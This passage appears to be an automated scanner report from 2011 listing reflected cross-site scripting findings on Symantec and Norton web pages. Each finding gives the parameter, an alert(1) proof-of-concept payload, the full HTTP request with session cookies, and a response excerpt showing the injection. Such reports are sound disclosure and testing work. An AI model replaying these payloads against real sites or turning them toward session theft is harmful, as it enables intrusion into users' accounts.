3.25. https://renewals.symantec.com/renewals/application [entry_point parameter]
Summary
Severity: High
Confidence: Certain
Host: https://renewals.symantec.com
Path: /renewals/application
Issue detail
The value of the entry_point request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 96f20"%3balert(1)//6e6ee0889dd was submitted in the entry_point parameter. This input was echoed as 96f20";alert(1)//6e6ee0889dd in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /renewals/application?source_code=WEB&entry_point=sym_lrc96f20"%3balert(1)//6e6ee0889dd &inid=us_pagenotfound_smb_store HTTP/1.1 Host: renewals.symantec.com Connection: keep-alive Referer: http://www.symantec.com/business/verisign/fraud-detection-service?tid=gnps User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: s_vi=[CS]v1|2735422985161DC5-600001A3801B01DD[CE]; s_pers=%20s_nr%3D1315621879623-New%7C1336357879623%3B%20event69%3Devent69%7C1336357879625%3B; s_sess=%20s_sv_sid%3D806960442771%3B%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_sv_112_s1=1@16@a//1315621570007; s_sv_112_p1=1@25@s/6036/5742/5736/5417&e/5
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:32:03 GMT Content-Type: text/html; charset=utf-8 Set-Cookie: entryURL=/renewals/application?source_code=WEB&entry_point=sym_lrc96f20"%3balert(1)//6e6ee0889dd&inid=us_pagenotfound_smb_store Content-Length: 21464 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7" /> <!-- BEGIN ...[SNIP]... = "null"; var cookieDays = 20; var idVisitor = "null"; if (idVisitor != "null") { s_2.visitorID = idVisitor; s_2.visitorID = s_2.visitorID.replace("-", "_hyphen_"); } s_2.campaign="WEB_sym_lrc96f20";alert(1)//6e6ee0889dd "; if (s_2.campaign == "null") s_2.campaign = "WEB"; s_2.currency="USD"; var friendlyEvents = ""; if (emailSent == "Y") { if (s_2.campaign != "null") { var r_email = s_2.getValOnce(s_2.campa...[SNIP]...
3.26. http://updatecenter.norton.com/ [NUCLANG parameter]
Summary
Severity: High
Confidence: Certain
Host: http://updatecenter.norton.com
Path: /
Issue detail
The value of the NUCLANG request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5366c"style%3d"x%3aexpression(alert(1))"0c17ca574c1 was submitted in the NUCLANG parameter. This input was echoed as 5366c"style="x:expression(alert(1))"0c17ca574c1 in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /?NUCLANG=en5366c"style%3d"x%3aexpression(alert(1))"0c17ca574c1 HTTP/1.1 Host: updatecenter.norton.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 ETag: "" Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET Date: Fri, 09 Sep 2011 21:46:07 GMT Connection: close Content-Length: 25501 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir = "ltr"> <head id="ctl00_Head1"><t...[SNIP]... <input type="hidden" id="LangSelected" value="en5366c"style="x:expression(alert(1))"0c17ca574c1 " />...[SNIP]...
3.27. http://www.symantec.com/business/verisign/fraud-detection-service [tid parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.symantec.com
Path: /business/verisign/fraud-detection-service
Issue detail
The value of the tid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6ed59"><script>alert(1)</script>0e8182bf4be was submitted in the tid parameter. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /business/verisign/fraud-detection-service?tid=gnps6ed59"><script>alert(1)</script>0e8182bf4be HTTP/1.1 Host: www.symantec.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: s_vi=[CS]v1|2735422985161DC5-600001A3801B01DD[CE]; s_pers=%20s_nr%3D1315621646660-New%7C1336357646660%3B%20event69%3Devent69%7C1336357646662%3B; s_sess=%20s_sv_sid%3D806960442771%3B%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_sv_112_s1=1@16@a//1315621570007; s_sv_112_p1=1@25@s/6036/5742/5736/5417&e/4
Response
HTTP/1.1 200 OK Server: Sun-Java-System-Web-Server/7.0 Content-Type: text/html;charset=UTF-8 Vary: Accept-Encoding Content-Length: 54792 Cache-Control: public, max-age=3563 Date: Fri, 09 Sep 2011 21:31:23 GMT Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <title>Risk-Based Authentication, Fraud Detection, Identity Theft Protection - Veri...[SNIP]... <meta name="om.page_name" content="en/us: biz: products: overview: information risk & compliance: verisign identity protection fraud detection service: gnps6ed59"><script>alert(1)</script>0e8182bf4be "/>...[SNIP]...
3.28. http://www.symantec.com/connect/sites/default/themes/connect2/images/favicon.ico [REST URL parameter 2]
Summary
Severity: High
Confidence: Certain
Host: http://www.symantec.com
Path: /connect/sites/default/themes/connect2/images/favicon.ico
Issue detail
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c2722'-alert(1)-'9a6003db3b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /connect/sitesc2722'-alert(1)-'9a6003db3b /default/themes/connect2/images/favicon.ico HTTP/1.1 Host: www.symantec.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: image/png,image/*;q=0.8,*/*;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Cookie: s_sess=%20s_sv_sid%3D1175532390374%3B%20init_search%3Dxss%2520site%253Awww.symantec.com%252Fconnect%252Fblogs%3B%20s_cc%3Dtrue%3B%20s_sq%3Dveritasnonconsumer%253D%252526pid%25253Dhttp%2525253A%2525252F%2525252Fsearchg.symantec.com%2525252Fsearch%2525253Fas_sitesearch%2525253Dwww.symantec.com%2525252Fconnect%2525252Fblogs%25252526q%2525253Dxss%25252526charset%2525253Dutf-8%25252526proxystylesheet%2525253Dsymc_en_US%25252526client%2525253Dsymc_en_US%25252526hitsceil%2525253D100%25252526site%2525253Dsymc_en_US%25252526output%2525253Dxml_no_dtd%25252526context%2525253Dent%25252526x%2525253D0%25252526y%2525253D0%25252526ie%2525253DUTF-8%25252526ip%2525253D50.23.123.106%25252526access%2525253Dp%25252526sort%2525253Ddat%252526oid%25253Dhttp%2525253A%2525252F%2525252Fwww.symantec.com%2525252Fconnect%252526ot%25253DA%2526veritasbizmarketing%253D%252526pid%25253Den%2525252Fus%2525253A%25252520biz%2525253A%25252520products%2525253A%25252520overview%2525253A%25252520information%25252520risk%25252520%25252526%25252520compliance%2525253A%25252520verisign%25252520identity%25252520protection%25252520fraud%25252520detection%25252520service%2525253A%25252520gnps6ed59%252526pidt%25253D1%252526oid%25253Dhttp%2525253A%2525252F%2525252Fwww.symantec.com%2525252Fimages%2525252Fmasthead%2525252Fsym-search-arrow.gif%252526ot%25253DIMAGE%3B; s_pers=%20s_nr%3D1315622057794-New%7C1336358057794%3B%20event69%3Devent69%7C1336358057796%3B; s_vi=[CS]v1|273542F98514ADEA-6000018C80043EDA[CE]
Response
HTTP/1.1 404 Not Found Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.17 Last-Modified: Fri, 09 Sep 2011 21:34:22 +0000 Vary: Cookie ETag: "1315604062" Content-Type: text/html; charset=utf-8 Content-Length: 29479 X-Varnish: 1369354182 X-Varnish-Cache: MISS Vary: Accept-Encoding Cache-Control: public, max-age=3600 Date: Fri, 09 Sep 2011 21:34:22 GMT Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr"> <head> <met...[SNIP]... <script type="text/javascript"> var symaccount_target_url = 'https://www-secure.symantec.com/connect/sitesc2722'-alert(1)-'9a6003db3b /default/themes/connect2/images/favicon.ico'; var symaccount_base_url = 'https://symaccount.symantec.com/'; var symaccount_li_cookie = 'lifb1d8525d94d660bc8f92b8419fd5ae1'; </script>...[SNIP]...
3.29. http://www.symantec.com/connect/sites/default/themes/connect2/images/favicon.ico [REST URL parameter 3]
Summary
Severity: High
Confidence: Certain
Host: http://www.symantec.com
Path: /connect/sites/default/themes/connect2/images/favicon.ico
Issue detail
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4ee12'-alert(1)-'de74577dedc was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /connect/sites/default4ee12'-alert(1)-'de74577dedc /themes/connect2/images/favicon.ico HTTP/1.1 Host: www.symantec.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: image/png,image/*;q=0.8,*/*;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Cookie: s_sess=%20s_sv_sid%3D1175532390374%3B%20init_search%3Dxss%2520site%253Awww.symantec.com%252Fconnect%252Fblogs%3B%20s_cc%3Dtrue%3B%20s_sq%3Dveritasnonconsumer%253D%252526pid%25253Dhttp%2525253A%2525252F%2525252Fsearchg.symantec.com%2525252Fsearch%2525253Fas_sitesearch%2525253Dwww.symantec.com%2525252Fconnect%2525252Fblogs%25252526q%2525253Dxss%25252526charset%2525253Dutf-8%25252526proxystylesheet%2525253Dsymc_en_US%25252526client%2525253Dsymc_en_US%25252526hitsceil%2525253D100%25252526site%2525253Dsymc_en_US%25252526output%2525253Dxml_no_dtd%25252526context%2525253Dent%25252526x%2525253D0%25252526y%2525253D0%25252526ie%2525253DUTF-8%25252526ip%2525253D50.23.123.106%25252526access%2525253Dp%25252526sort%2525253Ddat%252526oid%25253Dhttp%2525253A%2525252F%2525252Fwww.symantec.com%2525252Fconnect%252526ot%25253DA%2526veritasbizmarketing%253D%252526pid%25253Den%2525252Fus%2525253A%25252520biz%2525253A%25252520products%2525253A%25252520overview%2525253A%25252520information%25252520risk%25252520%25252526%25252520compliance%2525253A%25252520verisign%25252520identity%25252520protection%25252520fraud%25252520detection%25252520service%2525253A%25252520gnps6ed59%252526pidt%25253D1%252526oid%25253Dhttp%2525253A%2525252F%2525252Fwww.symantec.com%2525252Fimages%2525252Fmasthead%2525252Fsym-search-arrow.gif%252526ot%25253DIMAGE%3B; s_pers=%20s_nr%3D1315622057794-New%7C1336358057794%3B%20event69%3Devent69%7C1336358057796%3B; s_vi=[CS]v1|273542F98514ADEA-6000018C80043EDA[CE]
Response
HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Last-Modified: Fri, 09 Sep 2011 21:34:27 +0000
Vary: Cookie
ETag: "1315604067"
Content-Type: text/html; charset=utf-8
Content-Length: 29480
X-Varnish: 1921330105
X-Varnish-Cache: MISS
Vary: Accept-Encoding
Cache-Control: public, max-age=3600
Date: Fri, 09 Sep 2011 21:34:28 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<head>
<met...[SNIP]...
<script type="text/javascript">
var symaccount_target_url = 'https://www-secure.symantec.com/connect/sites/default4ee12'-alert(1)-'de74577dedc/themes/connect2/images/favicon.ico';
var symaccount_base_url = 'https://symaccount.symantec.com/';
var symaccount_li_cookie = 'lifb1d8525d94d660bc8f92b8419fd5ae1';
</script>...[SNIP]...
3.30. http://www.symantec.com/connect/sites/default/themes/connect2/images/favicon.ico [REST URL parameter 4]
Summary
Severity: High
Confidence: Certain
Host: http://www.symantec.com
Path: /connect/sites/default/themes/connect2/images/favicon.ico
Issue detail
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6ecbc'-alert(1)-'1d8cd1c6f5f was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /connect/sites/default/themes6ecbc'-alert(1)-'1d8cd1c6f5f/connect2/images/favicon.ico HTTP/1.1
Host: www.symantec.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: s_sess=%20s_sv_sid%3D1175532390374%3B%20init_search%3Dxss%2520site%253Awww.symantec.com%252Fconnect%252Fblogs%3B%20s_cc%3Dtrue%3B%20s_sq%3Dveritasnonconsumer%253D%252526pid%25253Dhttp%2525253A%2525252F%2525252Fsearchg.symantec.com%2525252Fsearch%2525253Fas_sitesearch%2525253Dwww.symantec.com%2525252Fconnect%2525252Fblogs%25252526q%2525253Dxss%25252526charset%2525253Dutf-8%25252526proxystylesheet%2525253Dsymc_en_US%25252526client%2525253Dsymc_en_US%25252526hitsceil%2525253D100%25252526site%2525253Dsymc_en_US%25252526output%2525253Dxml_no_dtd%25252526context%2525253Dent%25252526x%2525253D0%25252526y%2525253D0%25252526ie%2525253DUTF-8%25252526ip%2525253D50.23.123.106%25252526access%2525253Dp%25252526sort%2525253Ddat%252526oid%25253Dhttp%2525253A%2525252F%2525252Fwww.symantec.com%2525252Fconnect%252526ot%25253DA%2526veritasbizmarketing%253D%252526pid%25253Den%2525252Fus%2525253A%25252520biz%2525253A%25252520products%2525253A%25252520overview%2525253A%25252520information%25252520risk%25252520%25252526%25252520compliance%2525253A%25252520verisign%25252520identity%25252520protection%25252520fraud%25252520detection%25252520service%2525253A%25252520gnps6ed59%252526pidt%25253D1%252526oid%25253Dhttp%2525253A%2525252F%2525252Fwww.symantec.com%2525252Fimages%2525252Fmasthead%2525252Fsym-search-arrow.gif%252526ot%25253DIMAGE%3B; s_pers=%20s_nr%3D1315622057794-New%7C1336358057794%3B%20event69%3Devent69%7C1336358057796%3B; s_vi=[CS]v1|273542F98514ADEA-6000018C80043EDA[CE]
Response
HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Last-Modified: Fri, 09 Sep 2011 21:34:33 +0000
Vary: Cookie
ETag: "1315604073"
Content-Type: text/html; charset=utf-8
Content-Length: 29480
X-Varnish: 1921330192
X-Varnish-Cache: MISS
Vary: Accept-Encoding
Cache-Control: public, max-age=3600
Date: Fri, 09 Sep 2011 21:34:34 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<head>
<met...[SNIP]...
<script type="text/javascript">
var symaccount_target_url = 'https://www-secure.symantec.com/connect/sites/default/themes6ecbc'-alert(1)-'1d8cd1c6f5f/connect2/images/favicon.ico';
var symaccount_base_url = 'https://symaccount.symantec.com/';
var symaccount_li_cookie = 'lifb1d8525d94d660bc8f92b8419fd5ae1';
</script>...[SNIP]...
3.31. http://www.symantec.com/connect/sites/default/themes/connect2/images/favicon.ico [REST URL parameter 5]
Summary
Severity: High
Confidence: Certain
Host: http://www.symantec.com
Path: /connect/sites/default/themes/connect2/images/favicon.ico
Issue detail
The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bdc09'-alert(1)-'d98c9c18875 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /connect/sites/default/themes/connect2bdc09'-alert(1)-'d98c9c18875/images/favicon.ico HTTP/1.1
Host: www.symantec.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: s_sess=%20s_sv_sid%3D1175532390374%3B%20init_search%3Dxss%2520site%253Awww.symantec.com%252Fconnect%252Fblogs%3B%20s_cc%3Dtrue%3B%20s_sq%3Dveritasnonconsumer%253D%252526pid%25253Dhttp%2525253A%2525252F%2525252Fsearchg.symantec.com%2525252Fsearch%2525253Fas_sitesearch%2525253Dwww.symantec.com%2525252Fconnect%2525252Fblogs%25252526q%2525253Dxss%25252526charset%2525253Dutf-8%25252526proxystylesheet%2525253Dsymc_en_US%25252526client%2525253Dsymc_en_US%25252526hitsceil%2525253D100%25252526site%2525253Dsymc_en_US%25252526output%2525253Dxml_no_dtd%25252526context%2525253Dent%25252526x%2525253D0%25252526y%2525253D0%25252526ie%2525253DUTF-8%25252526ip%2525253D50.23.123.106%25252526access%2525253Dp%25252526sort%2525253Ddat%252526oid%25253Dhttp%2525253A%2525252F%2525252Fwww.symantec.com%2525252Fconnect%252526ot%25253DA%2526veritasbizmarketing%253D%252526pid%25253Den%2525252Fus%2525253A%25252520biz%2525253A%25252520products%2525253A%25252520overview%2525253A%25252520information%25252520risk%25252520%25252526%25252520compliance%2525253A%25252520verisign%25252520identity%25252520protection%25252520fraud%25252520detection%25252520service%2525253A%25252520gnps6ed59%252526pidt%25253D1%252526oid%25253Dhttp%2525253A%2525252F%2525252Fwww.symantec.com%2525252Fimages%2525252Fmasthead%2525252Fsym-search-arrow.gif%252526ot%25253DIMAGE%3B; s_pers=%20s_nr%3D1315622057794-New%7C1336358057794%3B%20event69%3Devent69%7C1336358057796%3B; s_vi=[CS]v1|273542F98514ADEA-6000018C80043EDA[CE]
Response
HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Last-Modified: Fri, 09 Sep 2011 21:34:39 +0000
Vary: Cookie
ETag: "1315604079"
Content-Type: text/html; charset=utf-8
Content-Length: 29480
X-Varnish: 1921330249
X-Varnish-Cache: MISS
Vary: Accept-Encoding
Cache-Control: public, max-age=3600
Date: Fri, 09 Sep 2011 21:34:39 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<head>
<met...[SNIP]...
<script type="text/javascript">
var symaccount_target_url = 'https://www-secure.symantec.com/connect/sites/default/themes/connect2bdc09'-alert(1)-'d98c9c18875/images/favicon.ico';
var symaccount_base_url = 'https://symaccount.symantec.com/';
var symaccount_li_cookie = 'lifb1d8525d94d660bc8f92b8419fd5ae1';
</script>...[SNIP]...
3.32. http://www.symantec.com/connect/sites/default/themes/connect2/images/favicon.ico [REST URL parameter 6]
Summary
Severity: High
Confidence: Certain
Host: http://www.symantec.com
Path: /connect/sites/default/themes/connect2/images/favicon.ico
Issue detail
The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 55f45'-alert(1)-'cc1ecd4f4c2 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /connect/sites/default/themes/connect2/images55f45'-alert(1)-'cc1ecd4f4c2/favicon.ico HTTP/1.1
Host: www.symantec.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: s_sess=%20s_sv_sid%3D1175532390374%3B%20init_search%3Dxss%2520site%253Awww.symantec.com%252Fconnect%252Fblogs%3B%20s_cc%3Dtrue%3B%20s_sq%3Dveritasnonconsumer%253D%252526pid%25253Dhttp%2525253A%2525252F%2525252Fsearchg.symantec.com%2525252Fsearch%2525253Fas_sitesearch%2525253Dwww.symantec.com%2525252Fconnect%2525252Fblogs%25252526q%2525253Dxss%25252526charset%2525253Dutf-8%25252526proxystylesheet%2525253Dsymc_en_US%25252526client%2525253Dsymc_en_US%25252526hitsceil%2525253D100%25252526site%2525253Dsymc_en_US%25252526output%2525253Dxml_no_dtd%25252526context%2525253Dent%25252526x%2525253D0%25252526y%2525253D0%25252526ie%2525253DUTF-8%25252526ip%2525253D50.23.123.106%25252526access%2525253Dp%25252526sort%2525253Ddat%252526oid%25253Dhttp%2525253A%2525252F%2525252Fwww.symantec.com%2525252Fconnect%252526ot%25253DA%2526veritasbizmarketing%253D%252526pid%25253Den%2525252Fus%2525253A%25252520biz%2525253A%25252520products%2525253A%25252520overview%2525253A%25252520information%25252520risk%25252520%25252526%25252520compliance%2525253A%25252520verisign%25252520identity%25252520protection%25252520fraud%25252520detection%25252520service%2525253A%25252520gnps6ed59%252526pidt%25253D1%252526oid%25253Dhttp%2525253A%2525252F%2525252Fwww.symantec.com%2525252Fimages%2525252Fmasthead%2525252Fsym-search-arrow.gif%252526ot%25253DIMAGE%3B; s_pers=%20s_nr%3D1315622057794-New%7C1336358057794%3B%20event69%3Devent69%7C1336358057796%3B; s_vi=[CS]v1|273542F98514ADEA-6000018C80043EDA[CE]
Response
HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Last-Modified: Fri, 09 Sep 2011 21:34:45 +0000
Vary: Cookie
ETag: "1315604085"
Content-Type: text/html; charset=utf-8
Content-Length: 29481
X-Varnish: 1369354450
X-Varnish-Cache: MISS
Vary: Accept-Encoding
Cache-Control: public, max-age=3600
Date: Fri, 09 Sep 2011 21:34:45 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<head>
<met...[SNIP]...
<script type="text/javascript">
var symaccount_target_url = 'https://www-secure.symantec.com/connect/sites/default/themes/connect2/images55f45'-alert(1)-'cc1ecd4f4c2/favicon.ico';
var symaccount_base_url = 'https://symaccount.symantec.com/';
var symaccount_li_cookie = 'lifb1d8525d94d660bc8f92b8419fd5ae1';
</script>...[SNIP]...
3.33. http://www.symantec.com/connect/sites/default/themes/connect2/images/favicon.ico [REST URL parameter 7]
Summary
Severity: High
Confidence: Certain
Host: http://www.symantec.com
Path: /connect/sites/default/themes/connect2/images/favicon.ico
Issue detail
The value of REST URL parameter 7 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload be710'-alert(1)-'6137fcbfa0a was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /connect/sites/default/themes/connect2/images/favicon.icobe710'-alert(1)-'6137fcbfa0a HTTP/1.1
Host: www.symantec.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: s_sess=%20s_sv_sid%3D1175532390374%3B%20init_search%3Dxss%2520site%253Awww.symantec.com%252Fconnect%252Fblogs%3B%20s_cc%3Dtrue%3B%20s_sq%3Dveritasnonconsumer%253D%252526pid%25253Dhttp%2525253A%2525252F%2525252Fsearchg.symantec.com%2525252Fsearch%2525253Fas_sitesearch%2525253Dwww.symantec.com%2525252Fconnect%2525252Fblogs%25252526q%2525253Dxss%25252526charset%2525253Dutf-8%25252526proxystylesheet%2525253Dsymc_en_US%25252526client%2525253Dsymc_en_US%25252526hitsceil%2525253D100%25252526site%2525253Dsymc_en_US%25252526output%2525253Dxml_no_dtd%25252526context%2525253Dent%25252526x%2525253D0%25252526y%2525253D0%25252526ie%2525253DUTF-8%25252526ip%2525253D50.23.123.106%25252526access%2525253Dp%25252526sort%2525253Ddat%252526oid%25253Dhttp%2525253A%2525252F%2525252Fwww.symantec.com%2525252Fconnect%252526ot%25253DA%2526veritasbizmarketing%253D%252526pid%25253Den%2525252Fus%2525253A%25252520biz%2525253A%25252520products%2525253A%25252520overview%2525253A%25252520information%25252520risk%25252520%25252526%25252520compliance%2525253A%25252520verisign%25252520identity%25252520protection%25252520fraud%25252520detection%25252520service%2525253A%25252520gnps6ed59%252526pidt%25253D1%252526oid%25253Dhttp%2525253A%2525252F%2525252Fwww.symantec.com%2525252Fimages%2525252Fmasthead%2525252Fsym-search-arrow.gif%252526ot%25253DIMAGE%3B; s_pers=%20s_nr%3D1315622057794-New%7C1336358057794%3B%20event69%3Devent69%7C1336358057796%3B; s_vi=[CS]v1|273542F98514ADEA-6000018C80043EDA[CE]
Response
HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Last-Modified: Fri, 09 Sep 2011 21:34:52 +0000
Vary: Cookie
ETag: "1315604092"
Content-Type: text/html; charset=utf-8
Content-Length: 29481
X-Varnish: 1369354548
X-Varnish-Cache: MISS
Vary: Accept-Encoding
Cache-Control: public, max-age=1794
Date: Fri, 09 Sep 2011 21:34:52 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<head>
<met...[SNIP]...
<script type="text/javascript">
var symaccount_target_url = 'https://www-secure.symantec.com/connect/sites/default/themes/connect2/images/favicon.icobe710'-alert(1)-'6137fcbfa0a';
var symaccount_base_url = 'https://symaccount.symantec.com/';
var symaccount_li_cookie = 'lifb1d8525d94d660bc8f92b8419fd5ae1';
</script>...[SNIP]...
3.34. http://www.symantec.com/s/searchg/suggest [q parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.symantec.com
Path: /s/searchg/suggest
Issue detail
The value of the q request parameter is copied into the HTML document as plain text between tags. The payload 6b734<script>alert(1)</script>b1904ad5262 was submitted in the q parameter. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /s/searchg/suggest?q=xss6b734<script>alert(1)</script>b1904ad5262&max=10&site=symc_en_US&client=symc_en_US&access=p&format=rich HTTP/1.1
